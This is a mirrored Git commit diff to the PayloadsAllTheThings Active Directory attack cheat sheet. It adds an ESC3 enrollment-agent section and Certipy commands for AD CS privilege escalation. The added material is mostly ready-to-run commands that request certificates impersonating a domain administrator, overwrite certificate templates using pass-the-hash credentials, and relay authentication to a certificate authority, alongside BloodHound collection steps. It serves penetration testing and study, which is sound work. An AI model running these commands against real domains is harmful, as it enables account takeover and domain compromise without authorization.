mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-07 18:48:47 +00:00
ESC3 - Misconfigured Enrollment Agent Templates + Certipy v2
This commit is contained in:
parent
71dcfd5ca7
commit
3e3562e553
1 changed files with 71 additions and 36 deletions
|
@ -75,9 +75,10 @@
|
||||||
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
||||||
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
||||||
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
||||||
|
- [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates)
|
||||||
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
|
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
|
||||||
* [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
||||||
* [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
|
@ -210,8 +211,7 @@ Use the correct collector
|
||||||
* AzureHound for Azure Active Directory
|
* AzureHound for Azure Active Directory
|
||||||
* SharpHound for local Active Directory
|
* SharpHound for local Active Directory
|
||||||
|
|
||||||
use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
* use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# require: Install-Module -name Az -AllowClobber
|
# require: Install-Module -name Az -AllowClobber
|
||||||
# require: Install-Module -name AzureADPreview -AllowClobber
|
# require: Install-Module -name AzureADPreview -AllowClobber
|
||||||
|
@ -221,8 +221,7 @@ Connect-AzAccount
|
||||||
Invoke-AzureHound
|
Invoke-AzureHound
|
||||||
```
|
```
|
||||||
|
|
||||||
use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# run the collector on the machine using SharpHound.exe
|
# run the collector on the machine using SharpHound.exe
|
||||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
||||||
|
@ -245,6 +244,10 @@ Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Passwor
|
||||||
pip install bloodhound
|
pip install bloodhound
|
||||||
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
||||||
```
|
```
|
||||||
|
* Collect more data for certificates exploitation using Certipy
|
||||||
|
```ps1
|
||||||
|
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
|
||||||
|
```
|
||||||
|
|
||||||
Then import the zip/json files into the Neo4J database and query them.
|
Then import the zip/json files into the Neo4J database and query them.
|
||||||
|
|
||||||
|
@ -264,6 +267,7 @@ You can add some custom queries like :
|
||||||
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
||||||
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
||||||
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
||||||
|
* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json)
|
||||||
|
|
||||||
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
||||||
|
|
||||||
|
@ -2213,11 +2217,12 @@ Exploitation:
|
||||||
or
|
or
|
||||||
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
||||||
```
|
```
|
||||||
* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate)
|
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
||||||
```ps1
|
```ps1
|
||||||
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
||||||
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
||||||
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
||||||
|
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
|
||||||
```
|
```
|
||||||
* Use OpenSSL and convert the certificate, do not enter a password
|
* Use OpenSSL and convert the certificate, do not enter a password
|
||||||
```ps1
|
```ps1
|
||||||
|
@ -2246,6 +2251,21 @@ Exploitation:
|
||||||
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
||||||
|
|
||||||
|
|
||||||
|
#### ESC3 - Misconfigured Enrollment Agent Templates
|
||||||
|
|
||||||
|
> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
|
||||||
|
|
||||||
|
* Request a certificate based on the vulnerable certificate template ESC3.
|
||||||
|
```ps1
|
||||||
|
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
|
||||||
|
[*] Saved certificate and private key to 'john.pfx'
|
||||||
|
```
|
||||||
|
* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
|
||||||
|
```ps1
|
||||||
|
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
#### ESC4 - Access Control Vulnerabilities
|
#### ESC4 - Access Control Vulnerabilities
|
||||||
|
|
||||||
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
||||||
|
@ -2266,6 +2286,17 @@ Exploitation:
|
||||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using Certipy
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# overwrite the configuration to make it vulnerable to ESC1
|
||||||
|
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
|
||||||
|
# request a certificate based on the ESC4 template, just like ESC1.
|
||||||
|
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local'
|
||||||
|
# restore the old configuration
|
||||||
|
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
|
||||||
|
```
|
||||||
|
|
||||||
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||||
|
|
||||||
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
||||||
|
@ -2287,7 +2318,7 @@ Mitigation:
|
||||||
#### ESC7 - Vulnerable Certificate Authority Access Control
|
#### ESC7 - Vulnerable Certificate Authority Access Control
|
||||||
|
|
||||||
Exploitation:
|
Exploitation:
|
||||||
* Detect CAs that allow low privileged users the ManageCA permission
|
* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe find /vulnerable
|
Certify.exe find /vulnerable
|
||||||
```
|
```
|
||||||
|
@ -2387,6 +2418,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||||
output - Output path to store base64 generated crt.
|
output - Output path to store base64 generated crt.
|
||||||
```
|
```
|
||||||
|
* Version 4: Certipy ESC8
|
||||||
|
```ps1
|
||||||
|
certipy relay -ca 172.16.19.100
|
||||||
|
```
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue